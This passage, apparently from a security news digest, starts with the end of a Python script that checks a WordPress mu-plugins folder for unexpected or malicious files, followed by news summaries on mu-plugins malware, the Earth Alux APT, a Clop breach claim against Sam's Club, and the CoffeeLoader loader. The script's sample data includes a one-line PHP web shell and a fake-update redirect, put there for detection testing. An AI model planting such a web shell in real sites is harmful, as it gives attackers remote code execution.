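    or 'ok' (allowlisted, nothing matched)."""
    allowed = set(allowlist)
    report = []
    for name in sorted(files):
        hits = [kind for kind, pattern in INDICATORS.items() if pattern.search(files[name])]
        if any(h in HIGH for h in hits):
            verdict = "escalate"
        elif name not in allowed or hits:
            verdict = "review"
        else:
            verdict = "ok"
        report.append({"file": name, "allowed": name in allowed, "indicators": hits, "verdict": verdict})
    return report


# Constructed contents of a mu-plugins directory.
MU_PLUGINS: Dict[str, str] = {
    "site-health-tweaks.php": "<?php\nadd_filter('wp_mail_from', fn($f) => 'noreply@example.org');\n",
    "wp-update.php": "<?php\nif (!is_admin()) { header('Location: https://example.net/browser-update'); exit; }\n",
    "index.php": "<?php\n@eval(base64_decode($_POST['c']));\n",
    "custom-assets.php": "<?php\nadd_filter('the_content', function ($c) { return str_replace('<img ', '<img loading=lazy ', $c); });\n",
}
# The site's own record of what is supposed to live in mu-plugins.
ALLOWLIST = {"site-health-tweaks.php"}


if __name__ == "__main__":
    for row in audit(MU_PLUGINS, ALLOWLIST):
        print(f"{row['verdict']:8} {row['file']:24} allowed={row['allowed']} {row['indicators']}")
```

Run it against a live site with audit(load_dir("/var/www/html/wp-content/mu-plugins"), allowlist); the allowlist is the control that matters most here, since a malicious file with no recognisable pattern still shows up as an unknown name.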

Recommended read:
References :
  • The DefendOps Diaries: Understanding the Threat: WordPress MU-Plugins and Security Risks
  • The Hacker News: Hackers Exploit WordPress mu-Plugins to Inject Spam and Hijack Site Images
  • BleepingComputer: Hackers abuse WordPress MU-Plugins to hide malicious code
  • www.scworld.com: WordPress attackers hide malware in overlooked plugins directory
  • Vulnerable U: Stealthy WordPress Malware Exploits Mu-Plugins Directory
  • bsky.app: Hackers are utilizing the WordPress mu-plugins ("Must-Use Plugins") directory to stealthily run malicious code on every page while evading detection.
  • Cyber Security News: Threat Actors Hide Malware in WordPress Sites to Execute Remote Code
  • gbhackers.com: Threat Actors Embed Malware in WordPress Sites to Enable Remote Code Execution
  • bsky.app: Hackers exploit little-known WordPress MU-plugins feature to hide malware
  • Graham Cluley: Hackers exploit little-known WordPress MU-plugins feature to hide malware
  • securityaffairs.com: Hiding WordPress malware in the mu-plugins directory to avoid detection
  • Risky.Biz: Hackers abuse secret WordPress feature you'll probably want to disable

Lenart Bermejo@feeds.feedburner.com //
Earth Alux, a China-linked advanced persistent threat (APT) group, has been identified launching cyberespionage attacks aimed at critical industries. Since the second quarter of 2023, this group has been targeting organizations in the Asia-Pacific (APAC) and Latin American regions, with a focus on sectors including government, technology, logistics, manufacturing, telecommunications, IT services, and retail. Trend Micro's monitoring and investigation efforts have uncloaked the group's stealthy activities and advanced techniques, highlighting the significant risk they pose to sensitive data and operational continuity.

Earth Alux primarily employs the VARGEIT malware as its main backdoor and control tool. VARGEIT is utilized at multiple stages of an attack to maintain persistence, collect data, and execute malicious operations. The malware operates as a multi-channel configurable backdoor with capabilities such as drive information collection, process monitoring, file manipulation, and command line execution. It can also inject additional tools into processes like mspaint.exe for fileless operations, making detection challenging. The group uses sophisticated techniques, including DLL sideloading, timestomping, and encrypted communication channels, to ensure stealth and evade conventional security systems.

Recommended read:
References :
  • Cyber Security News: Earth Alux Hackers Deploy VARGIET Malware in Targeted Organizational Attacks
  • Cyber Security News: The cybersecurity landscape has been disrupted by Earth Alux, a China-linked advanced persistent threat (APT) group actively conducting espionage operations since the second quarter of 2023. Initially targeting the Asia-Pacific region, the group expanded its operations to Latin America by mid-2024, primarily focusing on government, technology, logistics, manufacturing, telecommunications, IT services, and retail sectors in
  • gbhackers.com: Earth Alux Hackers Use VARGIET Malware to Target Organizations
  • Osint10x: The cyberespionage techniques of Earth Alux, a China-linked APT group, are putting critical industries at risk. The attacks, aimed at the APAC and Latin American regions, leverage powerful tools and techniques to remain hidden while stealing sensitive data.
  • www.trendmicro.com: The cyberespionage techniques of Earth Alux, a China-linked APT group, are putting critical industries at risk. The attacks, aimed at the APAC and Latin American regions, leverage powerful tools and techniques to remain hidden while stealing sensitive data.
  • securityonline.info: Earth Alux APT Group: Unveiling Its Espionage Toolkit
  • The Hacker News: China-Linked Earth Alux Uses VARGEIT and COBEACON in Multi-Stage Cyber Intrusions
  • www.scworld.com: The cyberespionage techniques of Earth Alux, a China-linked APT group, are putting critical industries at risk. The attacks, aimed at the APAC and Latin American regions, leverage powerful tools and techniques to remain hidden while stealing sensitive data.
  • Vulnerable U: The cyberespionage techniques of Earth Alux, a China-linked APT group, are putting critical industries at risk. The attacks, aimed at the APAC and Latin American regions, leverage powerful tools and techniques to remain hidden while stealing sensitive data.

Pierluigi Paganini@Security Affairs //
Sam's Club, the membership warehouse club chain owned by Walmart, is currently investigating claims of a Clop ransomware breach. The Clop ransomware group has reportedly taken responsibility for the alleged security incident. The investigation aims to determine the scope and nature of the potential data compromise, with Sam's Club stating they are actively looking into the matter.

The alleged breach is tied to the Clop ransomware operation's exploitation of vulnerabilities in Cleo file transfer software. Cybernews reports that Sam's Club is among the numerous organizations purportedly affected. Sam's Club has acknowledged the situation and initiated an internal investigation, though specific details regarding the alleged compromise remain limited. The company has affirmed its commitment to protecting the privacy and security of its members' information.

Recommended read:
References:
  • securityaffairs.com: The Walmart-owned membership warehouse club chain Sam’s Club is investigating claims of a Cl0p ransomware security breach.
  • bsky.app: Sam's Club investigates Clop ransomware breach claims
  • BleepingComputer: Retail giant Sam’s Club investigates Clop ransomware breach claims
  • cyberinsider.com: Walmart has confirmed to CyberInsider it launched an internal investigation following claims by the Clop ransomware group that it compromised Sam’s Club, a membership-based retail warehouse chain owned and operated by Walmart Inc.
  • www.scworld.com: Cybernews reports that Walmart's membership-only warehouse chain Sam's Club was among the hundreds of other organizations most recently claimed to have been breached by the Clop ransomware operation as part of its attacks leveraging a Cleo file transfer software vulnerability.
  • securityaffairs.com: Sam’s Club Investigates Alleged Cl0p Ransomware Breach

@www.infosecurity-magazine.com //
Cybersecurity researchers are raising concerns about a new sophisticated malware loader called CoffeeLoader, designed to stealthily download and execute secondary payloads while evading detection. The malware, first observed around September 2024, shares behavioral similarities with SmokeLoader, another known malware loader. CoffeeLoader employs a variety of techniques to bypass security solutions, including a specialized packer that utilizes the GPU, call stack spoofing, sleep obfuscation, and the use of Windows fibers.

CoffeeLoader's infection chain begins with a dropper that attempts to execute a DLL payload packed by Armoury, a packer that impersonates ASUS's Armoury Crate utility. The malware establishes persistence by creating scheduled tasks and relies on call stack spoofing and sleep obfuscation to evade antivirus and EDR solutions. Once it connects to its command-and-control server, CoffeeLoader receives commands to inject and execute Rhadamanthys shellcode. Although CoffeeLoader and SmokeLoader share notable similarities, researchers have not yet established the exact relationship between the two malware families.

Recommended read:
References:
  • The Hacker News: Researchers are calling attention to a new sophisticated malware called CoffeeLoader that's designed to download and execute secondary payloads.
  • : Security firm spots stealthy CoffeeLoader used in attacks
  • www.scworld.com: Windows devices have been targeted with attacks involving the novel CoffeeLoader malware that masquerades as Taiwanese computer hardware firm ASUS's Armoury Crate utility to covertly distribute the Rhadamanthys information-stealing malware and other malicious payloads, Cybernews reports.
  • ciso2ciso.com: Cybersecurity researchers are calling attention to a new sophisticated malware called CoffeeLoader that's designed to download and execute secondary payloads.
  • bsky.app: Zscaler has spotted a new malware loader named CoffeeLoader, used in the wild since September of last year. The malware was used together and appears to bear similarities with SmokeLoader.
  • securityaffairs.com: CoffeeLoader uses a GPU-based packer to evade detection
  • securityonline.info: GPU-Powered Evasion: Unpacking the Sophisticated CoffeeLoader Malware